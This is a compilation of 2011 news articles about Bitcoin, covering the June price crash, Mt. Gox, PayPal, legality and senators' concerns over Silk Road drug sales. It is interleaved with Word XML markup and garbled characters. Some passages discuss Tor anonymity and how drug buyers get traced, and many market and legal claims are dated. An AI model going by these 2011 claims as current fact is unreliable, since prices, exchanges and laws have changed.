Buy/Sell/Mine/Trade?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mining (building the Bitcoin economy via seeding) has shown itself thus far to be relatively safe. If you use current clients and hardware, you can generate Bitcoins at a competitive rate and sell them to break even off your hardware. After that, everything is pure profit.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Day trading Bitcoin currency, or accepting Bitcoins as a payment method is slightly more risky. Think of it as trading stock. You're unlikely to lose the majority of your value, but volatility could make it hard to instantly redeem your holdings in your nation's currency. Likewise, if your timing is poor (say if you bought into Bitcoins at $28 USD/Bitcoin on Thursday), you could lose a significant amount of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What's the Reward of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enjoy several advantages over traditional currencies. One of the biggest is the degree of anonymity they provide. While not completely anonymous, depending on the user's behavior, Bitcoins nonetheless offer a degree of privacy that's particularly affective in warding off cybercriminals or real-world enemies who might wish to target you for some reason.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advantage of Bitcoins is that they can be divided down to fractions 1e-8 - one hundred millionth of a Bitcoin. That fraction is called a "Satoshi", in honor of the "father" of Bitcoins. By allowing currency to be divided to finer fractions, buyers and sellers have greater flexibility in sales and bartering.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another advantage of Bitcoins is that they're not reliant on a single central monetary authority. Rather power is spread between individual users and Bitcoin exchanges. In this regard, they're not solely reliant on the financial success of an individual nation and, in theory, safer from concerted financial sabotage.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Is There a Bitcoin "Central Authority"?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no, there is not. One of the commonly spread notions about Bitcoins is that anyone can mine Bitcoins, anyone can use them, and anyone can start a Bitcoin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practice it takes a bit of technical skills to mine, buy, sell, or accept Bitcoins. It takes much more effort to start a Bitcoin exchange and actually get people to use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Probably the closest thing to a "central authority" in the Bitcoin world are the major exchanges. If the major exchanges - say Mt. Gox, bitomatPLN, virwoxSLL, britcoinGBP, bitmarketEUR, bcmPPUSD, and thUSD - all decided to implement trading rules that made the market close upon a gain or loss of over 5 percent of the currency's value in a single day, the whole market would be greatly affected. (We suggest such a change in are previous piece.)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exchanges have sufficient power to enact major changes because over 99 percent of the world's Bitcoin currency exchange volume is funneled through these seven exchanges.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practice, if you "didn't like" these changes, you could go and start your own exchange. However, much like a business, it takes a lot of know how to start one, and it takes a lot effort to promote them. Few people have the technical competence to start a Bitcoin exchange, fewer still the time to start one. And even less people have the time to promote a new exchange. So at the end of the day, the aforementioned seven "major" exchanges hold a great deal of power over the currency's application.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controls over 90 percent of the trading volume, so it's obviously the single most powerful entity in the Bitcoin world, by controlling Bitcoin currency exchange. In that regard its somewhat of a de facto authority, but its more of a community-elected power than a monetary policy dictator (unlike standard central banks).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 Is Bitcoin an International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Ostensibly yes, but in practice Bitcoins remain closely tied to the United States Dollar (USD). Mt. Gox accepts funds transferred from EuroWire, but traditionally it's been heavily driven via USD funds - transferred using mechanisms such as Paypal, Dwolla, Lindens, or Liberty Reserve.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Polish zloty and Euro (the European Union's currency) are two of the secondary most important currencies to the Bitcoin movement, though they reportedly drive a much smaller percent of the overall volume than USDs.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time passes, Bitcoins will likely evolve into more of an international currency, but like most world currencies, they will likely be tied to the currency of the prevailing world economic superpower. That superpower used to be Britain; today it is the U.S.; and someday it may be China. But suffice it to say, the Bitcoin is unlikely to replace traditional currencies, so it will likely be closely tied to the "dominant" currency of its era.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VII. Are Bitcoins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anonymous to an extent, via cryptographic mechanisms. However, transactions can be viewed on an IP level, thus anonymity is largely a measure of how well you hide your true location (your IP address).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use the address given to you by your internet service provider (ISP) for Bitcoin transactions, anyone with sufficient desire, technical savvy, and resources can probably trace you.</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obfuscate your IP via Tor or other services, your anonymity greatly increases. However, physical transactions in the real world driven by virtual Bitcoin exchanges can still compromise whatever anonymity you maintained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end of the day, the answer here is that Bitcoins do offer you a bit more anonymity than, say, transactions using U.S. twenty dollar bills. How much more anonymity they offer varies, but nonetheless, they are not "untraceable" when used to buy real world goods and services - not because they're traceable online, but because real world goods and services are inherently traceable.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VIII. Are Bitcoins Used to Buy Drugs? Is It Safe to Purchase Narcotics With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people have used Bitcoins to purchase narcotics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it is inadvisable to purchase narcotics or illegal services with Bitcoins. Narcotics are inherently associated with discrete real world transactions. You might think your Bitcoins are "untraceable", but a delivery of drugs from a known dealer sure isn't.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regard Bitcoins absolutely do not anonymize illicit, monitorable exchanges of goods and services. This is an extremely common misconception - one held even by some U.S. Senators.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understand this better, we shall present a short fictitious scenario. First, consider that a drug dealer may may ship crack cocaine to a person via the U.S. Postal Service, after a Bitcoin transaction. This transaction may go unnoticed by law enforcement. But the dealer is unlikely to only sell via Bitcoin. They probably will also sell to individuals on the street. Let us assume that after some time, they're caught and charged with a felony by police.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consider that law enforcement officials decide to track the felon's IP activity. They discover that they're using Bitcoin marketplaces. Then the police may start monitoring their shipments. Finally, let's consider that one of these tracked shipments, containing a case of ecstasy pills gets delivered to your house. You think you're safe - but you're not. Police have tracked the shipment and know you're in possession of narcotics. They raid your house, find the drugs and find you in possession of narcotics, and charge you. Not only that, additional charges may be tacked on for conspiring to deliver an illegal substance via the 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can track sales of illegal goods or services - e.g. narcotics or prostitution - via monitoring of real world exchanges and behavior. If you use Bitcoins to buy these kind of services, you stand a substantial risk to get caught, particularly as knowledge of Bitcoin use grows in the law enforcement community. As is typical with non-digital sales of these kinds of illegal items, the risk is thought to be somewhat lower if done from the privacy of your home. However, endemic offenses will likely be noticed and lead to arrests.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 whole debate about Bitcoins and drugs is overstated. Bitcoins aren't about drugs or crime. They can be used for a great deal of legitimate purposes. Even if your main reason for using Bitcoins is anonymity, there's plenty of legitimate reasons to desire that - to avoid government intrusions in your private life; to prevent other individuals (e.g. neighbors, your significant other, employers) from spying on you; and to prevent malicious individuals (such as hackers) from monitoring your activities.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IX. Are Bitcoins in Danger of Deflation?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deflation scenario bitcoins are expected to continue to rise in value versus the USD. For example, some expect they may one day hit anywhere from $100 USD/Bitcoin to $1,000 USD/Bitcoin.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Traditionally deflation is very bad for a currency, because it means that people won't want to spend the currency because it's so "valuable". But this is largely an effect of the particular currency's limitations imposed by its smallest denomination. In other words, if the smallest unit of currency is a penny and a penny can buy you a video game, you may not want to spend much money as it's so valuable.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traditional currencies deflation can have a disastrous effect on spending due to the reasons outlined above. However, Bitcoins offer divisions down to 1e-8 - which currently has a value of around 20 millionths of a penny.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Thus the "Satoshi" - the smallest unit of Bitcoin currency is unlikely to become significantly valuable even under the wildest deflation scenario. Thus, it's unlikely that people will hoard Bitcoins and that deflation will become a serious direct issue.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if one thousandth of a Bitcoin is worth one USD, it may prove a psychological barrier that will dissuade casual participants. For that reason it may be desirable to offer more Bitcoins after the planned initial generation of 21 million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will be up to the community to try to figure out exactly how to implement this, nonetheless it may be possible to expand the number of coins that the eventual "mature" market will have in distribution.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 Why Can't Paypal be Used for Bitcoins Anymore on Mt. Gox?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Paypal, a subsidiary of eBay, Inc. (EBAY), used to be accepted by Mt. Gox as a source of funds for purchases or sales of Bitcoins. Given the popularity of Paypal and the leading role of Mt. Gox, this was a major source of money transfers into and out of the exchange.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though, Mt. Gox banned Paypal. Some mistakenly believe this is due to insecurity or account theft on Paypal. In reality it's because of Paypal's policies. According to the Bitcoin wiki: This is due to repeated cases where someone pays for Bitcoins with Paypal, receives their Bitcoins, and then fraudulently complains to Paypal that they never received their goods. Paypal too often sides with the fraudulent buyer in this case, and so exchangers no longer allow this method of funding.Paypal most definitely would be a valuable ally to the Bitcoin movement and Bitcoin exchanges, however until they modify their policies to recognize and verify Bitcoin transactions, the majority of the community will have to move on without them. In the short term this seems unlikely to change - Paypal has a policy against virtual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 Are Bitcoins a Good Idea?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Arguably, the answer to this is yes. They have several distinct advantages outlined above.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easy to dismiss them because they have failed to behave like a traditional currency during their initial distribution. That said, they have already succeeded in generating a currency worth more than $130M USD - a value that approaches the GDP of a small nation.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offer the world's first digital-age currency. They reward early adopters uniquely, but they offer many benefits for supporters who come in at any point in the process.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 market clearly is very volatile. In order to overcome these growing pains, the community and exchanges may need to agree upon certain trading rules to prevent bidirectional rapid inflation/deflation swings.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XI. Are Bitcoins Legal?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Bitcoins are currently legal under U.S. laws. There are no laws that outlaw the trade of non-U.S. currency, as long as it is not represented falsely as U.S.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laws against unauthorized money exchange businesses [source]. However, the major exchanges like Mt. Gox are registered to individuals outside the U.S. in many cases and, further, may not qualify as a "business" as they charge no fees and do not make money off advertising.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long as the exchanges are run as nonprofit entities, they appear to be legal - even if they're operated within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has been recent pressure by Senators Charles Schumer (D,New York) and Joe Manchin (D, West Virginia) to shut down narcotics marketplaces that accept Bitcoins. That has led to fear that the government could next move against Bitcoin exchanges.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those fears are largely unfounded. Indeed, even the Senators' suggestion about the online marketplaces is full of misconceptions. For example they indicate that Bitcoin-driven narcotics sales are untraceable, which is simply not true, as outlined above.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XII. What is DailyTech's "Agenda" w.r.t.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DailyTech is a news site and its only agenda is to cover the news. Covering Bitcoins is a tough job as miners and those who support the movement are used to the media trying to discredit or destroy the movement, in some cases.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staffers do not currently hold any major Bitcoin holdings. Nor have we been contacted by any business or government agency to "discredit"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is independent and objective and is the result of a great deal of research. We welcome our readers' involvement and suggestions as many of them use or have experimented with the use of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happy to provide commentary to other news outlets regarding these and other observations regarding this unique phenomena.</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2011.06.13 03:17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.dailytech.com/Cracking+the+Bitcoin+Digging+Into+a+131M+USD+Virtual+Currency/article21878.htm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 the hacker currency that's taking over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private and untraceable, it's the monetary system of choice for libertarians, geeks, businesspeople and, apparently, drug kingpins Tweet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Ruth Whippman guardian.co.uk, Sunday 12 June 2011 20.00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even has the US government worried. Photograph: guardian.co.uk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two senators sent a letter to the US Attorney General, copied to the Drugs Enforcement Agency, alerting them to the existence of an underground website called Silk Road. Like a lawless eBay, Silk Road users can, according to the senators, "freely purchase and sell illegal drugs . . . from cocaine and heroin, to ecstasy and marijuana". For this they are using the digital currency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Created in 2009 by an anonymous Japanese computer science student using the pseudonym Satoshi Nakamoto, Bitcoin was initially adopted by hackers as a means of bartering services. Now it is fast becoming the unofficial currency of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Anyone can buy virtual "coins" at a variety of online exchanges, using major global currency Б─" but they aren't just used for drugs. The list of legitimate businesses that accept Bitcoin is growing all the time, from legal services to landscape gardening, video game retailers to makers of alpaca socks. With one Bitcoin currently traded at around бё9.22, the value of the whole Bitcoin economy is estimated at around бё32.6m and growing fast.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national currencies, Bitcoin has no central issuing authority. In theory, the "coins" can be created, or "mined" by anyone, but they require a powerful computer and a lot of time to generate. Their supply is controlled using a series of complex mathematical algorithms built into the software.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makes Bitcoin so appealing to its advocates, is that unlike other online methods of payment, such as credit cards or Paypal, transactions made using the currency are virtually untraceable, almost like a digital version of cash. As well as appealing to criminals, the anonymity Bitcoin offers is becoming increasingly attractive to ordinary people who object to the vast amount of personal information that is routinely collected by online retailers for marketing purposes.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odd alliance of libertarians, geeks, businesspeople and drug kingpins hail Bitcoin as the future of the internet Б─" global, private and immune from national economic crises and the whims of reckless bankers. Its critics in the political sphere fear that it could give rise to an online Wild West of gambling, prostitution and global bazaars for contraband.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dismissed as a nerdy curiosity, the untaxable Bitcoin may soon be due for a crackdown.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Ruth Whippman</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The Observer 2011.06.13 02:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.guardian.co.uk/technology/2011/jun/12/bitcoin-online-currency-us-government</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Bitcoin: the hacker currency that's taking over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private and untraceable, it's the monetary system of choice for libertarians, geeks, businesspeople and, apparently, drug kingpins Tweet this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Ruth Whippman guardian.co.uk, Sunday 12 June 2011 20.00 BST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even has the US government worried. Photograph: guardian.co.uk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week, two senators sent a letter to the US Attorney General, copied to the Drugs Enforcement Agency, alerting them to the existence of an underground website called Silk Road. Like a lawless eBay, Silk Road users can, according to the senators, "freely purchase and sell illegal drugs . . . from cocaine and heroin, to ecstasy and marijuana". For this they are using the digital currency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Created in 2009 by an anonymous Japanese computer science student using the pseudonym Satoshi Nakamoto, Bitcoin was initially adopted by hackers as a means of bartering services. Now it is fast becoming the unofficial currency of the web.</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Anyone can buy virtual "coins" at a variety of online exchanges, using major global currency Б─" but they aren't just used for drugs. The list of legitimate businesses that accept Bitcoin is growing all the time, from legal services to landscape gardening, video game retailers to makers of alpaca socks. With one Bitcoin currently traded at around бё9.22, the value of the whole Bitcoin economy is estimated at around бё32.6m and growing fast.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national currencies, Bitcoin has no central issuing authority. In theory, the "coins" can be created, or "mined" by anyone, but they require a powerful computer and a lot of time to generate. Their supply is controlled using a series of complex mathematical algorithms built into the software.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makes Bitcoin so appealing to its advocates, is that unlike other online methods of payment, such as credit cards or Paypal, transactions made using the currency are virtually untraceable, almost like a digital version of cash. As well as appealing to criminals, the anonymity Bitcoin offers is becoming increasingly attractive to ordinary people who object to the vast amount of personal information that is routinely collected by online retailers for marketing purposes.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odd alliance of libertarians, geeks, businesspeople and drug kingpins hail Bitcoin as the future of the internet Б─" global, private and immune from national economic crises and the whims of reckless bankers. Its critics in the political sphere fear that it could give rise to an online Wild West of gambling, prostitution and global bazaars for contraband.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dismissed as a nerdy curiosity, the untaxable Bitcoin may soon be due for a crackdown.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Ruth Whippman</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Guardian Unlimited 2011.06.13 01:21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.guardian.co.uk/technology/2011/jun/12/bitcoin-online-currency-us-government</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Digital Black Friday: First Bitcoin "Depression" Hits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Jason Mick (Blog) -</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Currency experiences massive inflation in a single day, markets stay open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day was October 28, 1929 and the sky was falling. That Monday the DOW Jones Industrial Average (DJIA) fell 12.82 percent. History books show that the next day the DJIA bled another 11.73 percent. Vast amounts of wealth were wiped out in an instant.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modern exchanges automatically close to prevent such catastrophic sell offs. Or, they do in the real world, at least. But on June 10, a new kind of market - Bitcoins suffered a massive decline, that may signal the start of the world's first digital depression.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 30 Percent Decline in One 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Friday the New York Stock Exchange (NYSE) was hammered, losing 172.45 points (approximately a 1.4 percent dip) to close below 12,000 for the first time since March 18, 2011 - nearly three months ago. Traders greeted signs of slowdowns in global markets with serious concern.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bad a day as Friday was for NYSE traders, it was far worse for those who invested in an increasingly popular digital currency - Bitcoins (BTC). At the opening bell at Mt. Gox, the world's largest Bitcoin exchange, a single BTC cost $28.919 USD. By mid-day that total had plunged to $20.01 USD - a drop of 30.8 percent.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Granted, in recent weeks the market for Bitcoins has soared upwards, nearly tripling, due to increased demand and built in technical issues. So perhaps this inflation was merely reactionary. Nonetheless, it took many by surprise, as inflation on this scale had never before been seen in the fledgling Bitcoin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wait let's not get ahead of ourselves. Why should anyone care if the Bitcoin market crashed?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today on Mt. Gox alone, approximately $2M USD in Bitcoins were bought and sold in 5,871 trades. That's unusual in and of itself - only a total of $19M USD in trading volume occurred over the past six months.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bottom line is that several things are clear from today's trading.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The Bitcoin market endured its first digital equivalent of a "bank rush" with people rushing to exchange their BTC for U.S. Dollars.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>2. People have a large amount of money - millions of USD sunk into Bitcoins lost big in the flash crash.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>3. Unlike modern markets, which automatically close to prevent massive inflation, the digital Bitcoin markets stayed open.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>4. Something major is moving the Bitcoin market in a sharp inflationary direction, in contrast to the predict deflationary trend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are Bitcoins and why is this intriguing? Let's take a look.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 What is a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[wiki] are virtual currency similar to the Linden Dollars (L$) used by Second Life users.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unlike L$, which are ultimately controlled by Linden Labs, a company (or "governing body" in some people's eyes), BTC have no central authority. The currency instead relies on a peer-to-peer system where everyone logs transactions and monetary events, prevent false transactions.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unlike the L$, the focus of BTC is to exchange the virtual currency for real world services, not virtual ones.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can obtain Bitcoins in two ways -- buying them or generating them.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generate them, you have to run a complex math hashing algorithm, which tries to find a new bitcoin "block". Parallel computing devices - namely GPUs have shown themselves most capable for this task. In fact with modern AMD GPUs it is possible to "break even" on your hardware costs by generating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 about Bitcoin generation, refer to DailyTech founder Kristopher Kubicki's webpage bitminer.info.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other method of gaining Bitcoins is to purchase them at an exchange - the largest of which is Mt. Gox. For a full list of exchanges, refer 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III. Are Bitcoins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biggest monkeys on the back of Bitcoins is public misconceptions about privacy.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a Reuters report quotes a letter from Senators Charles Schumer (D,New York) and Joe Manchin (D, West Virginia) wrote to Attorney General Eric Holder and Drug Enforcement Administration head Michele Leonhart stating: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method of payment for these illegal purchases is an untraceable peer-to-peer currency known as Bitcoins. After purchasing Bitcoins through an exchange, a user can create an account on Silk Road and start purchasing illegal drugs from individuals around the world and have them delivered to their homes within days.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Now this is somewhat misleading in that Bitcoins themselves can be more or less traceable than how the user communicates with uses their IPs. Any time a transaction occurs, it's sent out from an initial IP to nodes on the Bitcoin network, which verify its authenticity.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Silk Road, for example - the topic of a recent Gawker piece. An IP accesses this site, which is known for selling narcotics illegal in the U.S. If this is a user's direct IP, anyone who can sniff the traffic of the site can trace that user back to their home address, assuming cooperation of the internet service provider.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if you first route your IP through Tor - an anonymizing service, you can make it extremely difficult for anyone to trace you. This is because BitCoin "accounts" are regularly generated and a single individual holds keys to multiple microaccounts rather than a single large account. To an outsider, this account is just a random-looking string - nobody can tell who owns it. But using your personal key, you can sign transactions on the accounts you own.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long as the public/private key cryptography scheme is sound, and you anonymize your IP, even the government will have a relatively tough time tracking you. The same can be said about any activity that occurs online.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said, there's numerous ways your privacy could be compromised if your buying drugs or performing elicit activities. Some points of possible attack include: 1. Failure to anonymize IP due to using your direct ISP-provided IP address. 2. Failure to anonymize IP due to misconfiguration of Tor or other anonymizer (a surprisingly common occurrence).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>3. Tracking of physical goods associated with purchases.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Wait, you say, how could #3 occur? Well, let's say you order a kilo of powder cocaine, using your Bitcoin treasure trove. Well the kilo comes from a well known dealer who's being monitored by law enforcement for their real world activities. Law enforcement note the package arrives at your house. They wait for you to take it in and then begin using it. They obtain a warrant and raid your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Remember, almost no "drug dealer" is going to be exclusively doing business via Bitcoins. So they're likely engaging in real world transactions that will make it likely for law enforcement to inspect anything they decide to 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Bitcoin does provide users with a bit of anonymity, but to claim it's generally "untraceable" in principle is pure paranoia on certain government officials' and journalists' part. Bitcoin-driven transactions are very traceable; it's just that so far nobody has been interested in investing the large amount of effort it would take to trace them, as they have with copyright infringement or child pornography.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DEA's response indeed seems to hint at this. Reuters quotes agency spokeswoman Dawn Dearden as stating, "The DEA is constantly evaluating and analyzing new technologies and schemes perpetrated by drug trafficking networks. While we won't confirm or deny the existence of specific investigations, DEA is well aware of these emerging threats and we will act accordingly."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 A Big Problem - Getting Money In Or Out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threat of the U.S. government taking some sort of action over anonymity fears is certainly looming over the Bitcoin market, a far more serious problem is liquidity. In the traditional global currency markets, you can instantly exchange your currency for other foreign currencies on a number of exchanges. These exchanges can take bank wires or funds from digital accounts, such as Paypal.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contrast Bitcoin exchanges like Mt. Gox do not accept debit/credit transactions. Up until last week they did accept eBay, Inc. (EBAY) subsidiary PayPal. However, PayPal has blocked transactions to the site. This is because PayPal has a policy against virtual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an easy PayPal route gone, market liquidity was dramatically reduced. This may be a major cause for the market crash.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the most well published ways to convert Bitcoins to USD or vice versa is to use Dwolla or Liberty Reserve. These methods are relatively straightforward, but transactions through these online billing services often move at a glacial pace, hampering liquidity. API problems with Dwolla further exacerbated the liquidity issues in recent weeks at Mt. Gox.</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also mail a check to a certain individual known as "Bitcoin Morpheus" listed at the exchange, who will add funds to your Mt. Gox account. Granted this route might not be for the faint of heart as it seems rather "unorthodox" to say the least.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there is another method that could work slightly faster than any of the above. For now you can use a variety of means to quickly buy L$ (Second Life currency) and then use the virwoxSLL exchange to exchange L$ to BTC. The purpose of L$ and BTC is quite different, so it's unclear how long this route will stay viable, and many people don't realize you can get Bitcoins in this fashion.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end of the day Bitcoin has a very real liquidity problem.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 What's Next for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Unless Gawker and other media outlets can drum up enough unfounded paranoia about peer-to-peer currency to evoke some kind of draconian action by the U.S. federal government, it's unlikely that Bitcoins will go away.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market volatility poses a very serious risk to BTC users - be they miners, traders, or merchants who accept BTC as payment for goods or services. To that end, a major improvement would be for Bitcoin exchanges to implement mandatory market closures if the currency value dropped below a threshold. In theory this would be relatively easy to implement, and we expect that it will be done at some point to prevent one-day flash inflation/deflation.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a viable billing service must step up and offer people the ability to use credit or debit card billable transactions in USD to buy bitcoins quickly and directly on a major exchange (e.g. Mt. Gox). If this can be done, market liquidity can be restored and the currency will once more flourish.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but not least, concerns about deflation must be addressed as demand grows and production slows. As mentioned in the introduction, if deflation is not controlled, reactionary inflation spurts could be experienced. Indeed, a reactionary market movement could have been part of the cause for today's record-setting inflation.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possible that additional bitcoins could be distributed or other mechanism employed to prevent deflation, much as they are with standard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certainly a novel idea in their implementation details and purpose. This article offers an introduction, but barely skims the surface of this phenomena and the true facts about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some and they'll say Bitcoins are a scam/pyramid scheme. Ask others and they'll say the Bitcoin market has the promise to offer sustained success. There's valid arguments on both sides, but at the end of the day Bitcoins will still be around for the forseeable future.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trading late Friday, Bitcoins recouped nearly half their losses, bouncing back to 24.34. That's still a massive crash - around 15 percent in one day. But it shows that the market isn't dead. The U.S. economy survived Black Friday and today sustains a massive amount of wealth. Likewise, perhaps the Bitcoin movement can survive this tough time and find its way. After all - people are still buying Bitcoins.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>DailyTech 2011.06.11 02:17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.dailytech.com/Digital+Black+Friday+First+Bitcoin+Depression+Hits/article21877.htm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Senators draw a bead on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Shock: people buy drugs with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Richard Chirgwin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US senators have called on American authorities to crack down on the Bitcoin peer-to-peer online Б─°currencyБ─² after discovering itБ─(tm)s being used, rather like greenbacks in personal transactions, to buy drugs anonymously.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uses a decentralized model: users exchange Bitcoins directly between each other in encrypted, digitally-signed transactions. It touches the Б─°realБ─² economy only where an individual is willing to shoulder the risk of exchanging Bitcoins for currencies.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exchange markets exist, Bitcoins have attracted sufficient Б─°realБ─² value to buy and sell real-world goods and, according to Democrat senators Charles Schumer (New York) and Joe Manchin (West Virginia), one application of Bitcoin has been to buy drugs. The pair have written to US Attorney General Eric Holder and DEA chief Michele Leonhart calling for action against Bitcoin and the online drug marketplace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had only recently started attracting mainstream attention, and was shot into the spotlight by a Gawker article describing its use on Silk Road (Gawker later pointed out the appreciating value of Bitcoins once people realized they could be exchanged for dope).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P2P networks are difficult to shut down, the obvious point of attack would be the bank accounts of individuals who trade Bitcoins for currencies. Such action, however, would require international cooperation since account-holders could live anywhere.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DEA spokesperson Dawn Dearden told Reuters the agency is watching both Bitcoin and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 is unlikely to be the last time Bitcoin attracts unwanted government attention. New Scientist recently noted (login required) the likelihood that tax agencies will want to get a handle on it, quoting Her MagestyБ─(tm)s Revenue &amp; Customs as saying that turning Bitcoins into currency could make transactions taxable. If traced by the Australian Tax Office, Bitcoins would probably get the same treatment as Б─°barterБ─² exchanges, with tax assessed on the value of traded goods or services.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also been criticized as having the characteristics of a Ponzi scheme. New users acquire the currency by running the software on their computers, and occasionally Б─°striking it luckyБ─² when they discover the number of the next Bitcoin to be issued. Over time, the Bitcoin algorithm is designed to slow down the rate at which new Bitcoins are issued Б─" which means early adopters were able to amass more coins more quickly than todayБ─(tm)s user; and, if the network continues to grow, todayБ─(tm)s user will amass more of the currency than someone who joins the network two years from now.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gives all current users a vested interest in promoting the system to the next round of participants.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architecture therefore encourages boosterism such as this article from Rick Falkvinge, who can tell users to get on board even though this would lift the value of his own Bitcoin buy-in (Falkvinge quite cheerfully tells his readers Б─°as more people exchange national currencies for Bitcoin, the value of one Bitcoin rises).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looks like BitcoinБ─(tm)s evangelists have over-reached: by mainstreaming the Bitcoin story, theyБ─(tm)ve also ensured it's going to come under the kind of national scrutiny they hoped to avoid. бў</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Pro-active service monitoring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 infrastructure as a service- ways of getting this aligned with your business needs.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CIO to CIO Research Study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IDG Research Services results looks at how CIOs and IT leaders recognize the business impact of application performance.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Webcast: Student Cluster Competition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spend some time talking to Doug Fuller, an Oak Ridge National Lab Computational Scientist and also chair of the upcoming SC11 Student Cluster Competition.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HPC trends: Where We Are, Where WeБ─(tm)re Going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come the Top500 supercomputers are getting so damn fast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Ubuntu Desktop for the enterprise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paper looks at three key areas where Ubuntu delivers compelling technical benefits: productivity; security; and management and support.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more Resources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The Register 2011.06.09 02:35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.theregister.co.uk/2011/06/08/bitcoin_under_attack/</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Senators seek crackdown on "Bitcoin"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Brett Wolf Brett Wolf - 2 hrs 17 mins ago</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 LOUIS (Thomson Reuters Accelus) - Two senators are pressing federal authorities to crack down on an online black market and "untraceable" digital currency known as Bitcoins after reports that they are used to buy illegal drugs anonymously.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Democratic Senators Charles Schumer of New York and Joe Manchin of West Virginia wrote to Attorney General Eric Holder and Drug Enforcement Administration head Michele Leonhart in a letter that expressed concerns about the underground website "Silk Road" and the use of Bitcoins to make purchases there.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letter prompted a discussion among Bitcoin enthusiasts about whether the government was capable of closing related bank accounts and thereby stifling the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senators released a copy of their letter on Monday. It cites recent media reports that some tech-savvy individuals were using an "anonymizing network" known as Tor to gain clandestine access to Silk Road and buy illegal drugs.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buyers pay with Bitcoins and sellers mail the drugs, the Gawker blog reported. The transactions leave no traditional money trail for investigators to follow, and leave it hard to prove a package recipient knew in advance what was in a shipment.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method of payment for these illegal purchases is an untraceable peer-to-peer currency known as Bitcoins. After purchasing Bitcoins through an exchange, a 